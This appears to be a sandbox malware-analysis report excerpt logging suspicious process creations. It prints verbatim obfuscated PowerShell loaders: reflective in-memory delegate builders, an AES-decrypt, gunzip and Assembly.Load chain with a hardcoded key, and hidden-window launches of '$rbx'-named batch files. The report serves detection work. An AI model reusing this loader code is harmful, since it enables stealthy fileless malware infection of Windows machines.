$MsesbhAsMah.CreateType();}$gFfWslPcsIxEF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'e'+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+'i'+'n'+'32.'+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'Na'+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+'s');$xRDavNIGnzLLon=$gFfWslPcsIxEF.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+''+'A'+''+[Cha
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YrWHxoHyNMxl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mJbpaFOyxDMlLp,[Parameter(Position=1)][Type]$mBxcLwMzji)$qsXeIcuzIEU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+'m'+'o'+[Char](114)+''+'y'+''+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+'l'+'e'+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+''+'y'+''+'p'+'e',''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+'d'+','+[Char](65)+''+'n'+'siC'+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+''+'A'+'ut'+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qsXeIcuzIEU.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+[Char](101)+''+[Char](99)+''+'i'+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,H'+'i'+''+'d'+'e'+'B'+''+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+''+'m'+''+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+''+'a'+''+'g'+''+'e'+''+'d'+'');$qsXeIcuzIEU.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+'H'+'i'+'d'+''+'e'+'B'+[Char](121)+''+[Char](83)+'i'+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+','+'V'+''+[Char](105)+''+'r'+'t'+[Char](117)+'a'+[Char](108)+'',$mBxcLwMzji,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $qsXeIcuzIEU.CreateType();}$XabpoaxiZGEGR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+[Char](105)+'n32'+[Char](46)+'Uns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ONnlOWkAfaUoGE=$XabpoaxiZGEGR.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+'d'+''+[Cha
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NyGuwfckeOJe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kiyDauQzMkkpvQ,[Parameter(Position=1)][Type]$OzRVWwEZvx)$JcZRwmspQGK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+'e'+[Char](109)+''+[Char](111)+'ry'+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+'e'+'',''+'C'+''+'l'+''+'a'+''+'s'+'s,P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+','+''+[Char](83)+''+[Char](101)+''+'a'+'le'+'d'+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+'u'+'t'+'o'+[Char](67)+''+'l'+''+'a'+'ss',[MulticastDelegate]);$JcZRwmspQGK.DefineConstructor('RT'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+','+'H'+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kiyDauQzMkkpvQ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'ime,'+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$JcZRwmspQGK.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+'e'+'B'+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+','+'V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$OzRVWwEZvx,$kiyDauQzMkkpvQ).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+'ge'+'d'+'');Write-Output $JcZRwmspQGK.CreateType();}$fMzQsfZpmgSNo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+'em'+'.'+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+'ns'+'a'+''+'f'+''+'e'+''+[Char](78)+''+'a'+'t'+[Char](105)+''+'v'+'eM'+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$kCZXEMoRMGVaoJ=$fMzQsfZpmgSNo.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[
        Suspicious command line found
        Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
        Source: unknownProcess created: cmd.exe /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
        Source: unknownProcess created: "C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
        Source: unknownProcess created: "C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] ('')); Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
        Suspicious powershell command line found
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fuLUlHVbHHgj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NnulhBqzTpRDhV,[Parameter(Position=1)][Type]$OFCpxNfkPy)$qvWXxLMOaNu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Me'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+'odul'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+'e'+'T'+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+'a'+'ss'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+'s'+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qvWXxLMOaNu.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'Pu'+'b'+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+',Ma'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$qvWXxLMOaNu.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+'l'+[Char](105)+'c'+','+''+[Char](72)+''+[Char](105)+'de'+'B'+''+'y'+''+'S'+'i'+[Char](103)+','+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+'ot'+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+[Char](117)+''+'a'+'l',$OFCpxNfkPy,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+','+'M'+'a'+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $qvWXxLMOaNu.CreateType();}$iKNksxDtTNKAc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](10
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kveHNQwSSGcg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mhKVIvEXzPrIho,[Parameter(Position=1)][Type]$QOutAUbbtF)$MsesbhAsMah=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+'e'+''+'c'+'te'+'d'+'D'+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+'ry'+[Char](77)+''+[Char](111)+'dul'+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+'s'+'s'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](65)+'u'+[Char](116)+'o'+'C'+'la'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$MsesbhAsMah.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+'ame'+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+''